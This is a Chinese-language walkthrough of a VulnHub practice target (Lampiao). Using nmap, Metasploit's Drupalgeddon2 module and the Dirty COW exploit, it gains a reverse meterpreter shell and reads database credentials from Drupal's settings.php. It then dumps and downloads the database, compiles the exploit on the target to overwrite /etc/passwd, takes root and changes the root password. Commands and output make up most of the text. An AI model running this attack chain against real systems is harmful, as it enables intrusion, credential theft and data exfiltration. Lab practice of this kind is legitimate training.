提权(1), 脱裤, dirty-cow脏牛提权
本实验以打靶为案例演示脱裤
和dirty-cow
脏牛提权的操作过程.
实验环境:
靶机: https://www.vulnhub.com/entry/lampiao-1,249/
本地: 192.168.112.201, kali
目标: 192.168.112.202
一, 信息搜集
扫描全端口:
nmap -p- 192.168.112.202
22/tcp open ssh
80/tcp open http
1898/tcp open cymtec-port
扫描端口服务的版本, 操作系统信息等:
nmap -sV -A 192.168.112.202
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 46b199607d81693cae1fc7ffc366e310 (DSA)
| 2048 f3e888f22dd0b2540b9cad6133595593 (RSA)
| 256 ce632af7536e46e2ae81e3ffb716f452 (ECDSA)
|_ 256 c655ca073765e306c1d65b77dc23dfcc (ED25519)
80/tcp open http?
| fingerprint-strings:
| NULL:
AC Address: 00:0C:29:CB:D6:D6 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
这里发现没有出现80, 1898的指纹. 1898不是常用端口, 单独扫一下看看.
nmap -sV -p1898 192.168.112.202
1898/tcp open http Apache httpd 2.4.7 ((Ubuntu))
发现1898端口开着apache, 这可能是个网站, 尝试访问网站.
用浏览器访问80端口, 发现不是网站页面.
用浏览器访问1898端口, 发现网站页面, 观察一下页面.
在页面最下方发现 Powered by Drupal
说明可能是用 Drupal
CMS开发的.
扫描网站指纹确认一下:
whatweb 192.168.112.202:1898
Drupal 7 (http://drupal.org)], PHP[5.5.9-1ubuntu4.24]
二, 漏洞利用
进入MSF, 搜索 Drupal 相关的模块.
search drupal
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/unix/webapp/drupal_coder_exec 2016-07-13 excellent Yes Drupal CODER Module Remote Command Execution
1 exploit/unix/webapp/drupal_drupalgeddon2 2018-03-28 excellent Yes Drupal Drupalgeddon 2 Forms API Property Injection
2 exploit/multi/http/drupal_drupageddon 2014-10-15 excellent No Drupal HTTP Parameter Key/Value SQL Injection
3 auxiliary/gather/drupal_openid_xxe 2012-10-17 normal Yes Drupal OpenID External Entity Injection
4 exploit/unix/webapp/drupal_restws_exec 2016-07-13 excellent Yes Drupal RESTWS Module Remote PHP Code Execution
5 exploit/unix/webapp/drupal_restws_unserialize 2019-02-20 normal Yes Drupal RESTful Web Services unserialize() RCE
6 auxiliary/scanner/http/drupal_views_user_enum 2010-07-02 normal Yes Drupal Views Module Users Enumeration
7 exploit/unix/webapp/php_xmlrpc_eval 2005-06-29 excellent Yes PHP XML-RPC Arbitrary Code Execution
Interact with a module by name or index. For example info 7, use 7 or use exploit/unix/webapp/php_xmlrpc_eval
选drupal_drupalgeddon2做尝试:
use 1
msf6 exploit(unix/webapp/drupal_drupalgeddon2) >
查看选项参数:
show options
Module options (exploit/unix/webapp/drupal_drupalgeddon2):
Name Current Setting Required Description
---- --------------- -------- -----------
DUMP_OUTPUT false no Dump payload command output
PHP_FUNC passthru yes PHP function to execute
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes Path to Drupal install
VHOST no HTTP server virtual host
设置 rhosts 和 rport:
set rhosts 192.168.112.202
set rport 1898
执行模块脚本:
run
[*] Started reverse TCP handler on 192.168.112.201:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable.
[*] Sending stage (39927 bytes) to 192.168.112.202
[*] Meterpreter session 2 opened (192.168.112.201:4444 -> 192.168.112.202:56586) at 2023-12-01 09:08:43 -0500
meterpreter >
这里进入了 meterpreter 环境, 漏洞利用成功.
三, 脱裤
反弹shell:
shell
Process 26184 created.
Channel 0 created.
用python开启虚拟bash:
python -c ‘import pty;pty.spawn(“/bin/bash”)’
www-data@lampiao:/var/www/html$
一般CMS都有默认的配置文件路径, 可以从网上去搜索.
找到 drupal CMS 的配置文件 sites/default/settings.php:
打开文件, 找到数据库的配置信息:
'database' => 'drupal',
'username' => 'drupaluser',
'password' => 'Virgulino',
'host' => 'localhost',
'port' => '',
'driver' => 'mysql',
'prefix' => '',
那么这里看到了mysql的用户名, 密码, 数据库名.
检查mysqldump命令:
whereis mysqldump
mysqldump: /usr/bin/mysqldump /usr/share/man/man1/mysqldump.1.gz
脱裤:
mysqldump -udrupaluser -pVirgulino drupal > drupal.sql
退回 meterpreter 控制台:
exit
下载 drupal.sql 文件到本地:
download drupal.sql /root
四, Dirty-Cow 脏牛提权
linux系统尝试脏牛漏洞提权, Dirty-Cow
1. 查看当前用户权限
getuid
Server username: www-data
反弹shell:
shell
Process 27216 created.
Channel 1 created.
用python开启虚拟bash:
python -c ‘import pty;pty.spawn(“/bin/bash”)’
2. 检查目标的编译环境
python --version
php -v
gcc -v
Python 2.7.6
PHP 5.5.9-1ubuntu4.24 (cli) (built: Mar 16 2018 12:32:06)
Copyright (c) 1997-2014 The PHP Group
Zend Engine v2.5.0, Copyright (c) 1998-2014 Zend Technologies
with Zend OPcache v7.0.3, Copyright (c) 1999-2014, by Zend Technologies
gcc version 4.8.4 (Ubuntu 4.8.4-2ubuntu1~14.04.4)
2. kali搜索脏牛代码
dirty-cow不在msf的模块库中, 所以需要在网上或者kali中单独搜索.
网站搜索: exploit-db.com
searchsploit dirty
-------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
-------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Linux Kernel - 'The Huge Dirty Cow' Overwriting The Huge Zero Page (1) | linux/dos/43199.c
Linux Kernel - 'The Huge Dirty Cow' Overwriting The Huge Zero Page (2) | linux/dos/44305.c
Linux Kernel 2.6.22 < 3.9 (x86/x64) - 'Dirty COW /proc/self/mem' Race Condition Privilege Escalation (SUID Method) | linux/local/40616.c
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW /proc/self/mem' Race Condition Privilege Escalation (/etc/passwd Method) | linux/local/40847.cpp
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW PTRACE_POKEDATA' Race Condition (Write Access Method) | linux/local/40838.c
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' 'PTRACE_POKEDATA' Race Condition Privilege Escalation (/etc/passwd Method) | linux/local/40839.c
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' /proc/self/mem Race Condition (Write Access Method) | linux/local/40611.c
Linux Kernel 5.8 < 5.16.11 - Local Privilege Escalation (DirtyPipe) | linux/local/50808.c
Qualcomm Android - Kernel Use-After-Free via Incorrect set_page_dirty() in KGSL | android/dos/46941.txt
Quick and Dirty Blog (qdblog) 0.4 - 'categories.php' Local File Inclusion | php/webapps/4603.txt
Quick and Dirty Blog (qdblog) 0.4 - SQL Injection / Local File Inclusion | php/webapps/3729.txt
snapd < 2.37 (Ubuntu) - 'dirty_sock' Local Privilege Escalation (1) | linux/local/46361.py
snapd < 2.37 (Ubuntu) - 'dirty_sock' Local Privilege Escalation (2) | linux/local/46362.py
-------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
通常使用 /etc/passwd
方法提权, 40839.c
和 40847.cpp
, 这两个是c或c++源码, 需要编译才能使用.
3. 尝试 40847.cpp 提权
查看源码的路径:
searchsploit -p 40847
Exploit: Linux Kernel 2.6.22 < 3.9 - 'Dirty COW /proc/self/mem' Race Condition Privilege Escalation (/etc/passwd Method)
URL: https://www.exploit-db.com/exploits/40847
Path: /usr/share/exploitdb/exploits/linux/local/40847.cpp
Codes: CVE-2016-5195
Verified: True
File Type: C++ source, ASCII text
查看源码注释:
vi /usr/share/exploitdb/exploits/linux/local/40847.cpp
// EDB-Note: Compile: g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow 40847.cpp -lutil
// EDB-Note: Recommended way to run: ./dcow -s (Will automatically do "echo 0 > /proc/sys/vm/dirty_writeback_centisecs")
从 meterpreter 上传代码到目标主机/tmp
目录下:
upload /usr/share/exploitdb/exploits/linux/local/40847.cpp /tmp
反弹shell:
shell
进入虚拟bash:
python -c ‘import pty;pty.spawn(“/bin/bash”)’
www-data@lampiao:/var/www/html$
进入/tmp
目录编译源码:
这行代码编译出一个 dcow
可执行文件.
g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow 40847.cpp -lutil
<-Wall -pedantic -O2 -std=c++11 -pthread -o dcow 40847.cpp -lutil
执行程序:
./dcow -s
Running ...
Password overridden to: dirtyCowFun
Received su prompt (Password: )
root@lampiao:~# echo 0 > /proc/sys/vm/dirty_writeback_centisecs
root@lampiao:~# cp /tmp/.ssh_bak /etc/passwd
root@lampiao:~# rm /tmp/.ssh_bak
root@lampiao:~#
root提权成功.
查看权限:
id
uid=0(root) gid=0(root) groups=0(root)
修改root密码:
passwd
Enter new UNIX password: root
Retype new UNIX password: root
passwd: password updated successfully